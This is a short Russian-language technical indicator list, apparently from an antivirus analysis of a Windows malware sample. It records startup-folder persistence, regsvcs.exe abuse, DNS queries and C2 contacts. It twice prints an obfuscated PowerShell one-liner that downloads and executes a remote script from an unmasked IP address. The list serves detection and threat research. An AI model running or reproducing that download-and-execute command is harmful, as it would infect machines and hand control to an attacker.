Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\c.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrinG'('ht'+'tp://8.129.118.161/wp-admin/css/d')
- %WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe
- c.exe
- '8.###.118.161':80
- 'ip##pi.com':80
- 'sy#####r.publicvm.com':4782
- http://8.###.118.161/wp-admin/css/d
- http://8.###.118.161/wp-admin/css/c
- http://ip##pi.com/json/
- 'sy#####r.publicvm.com':4782
- DNS ASK ip##pi.com
- DNS ASK sy#####r.publicvm.com
- '%APPDATA%\microsoft\windows\start menu\programs\startup\c.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrinG'('ht'+'tp://8.129.118.161/wp-admin/css/d')' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe'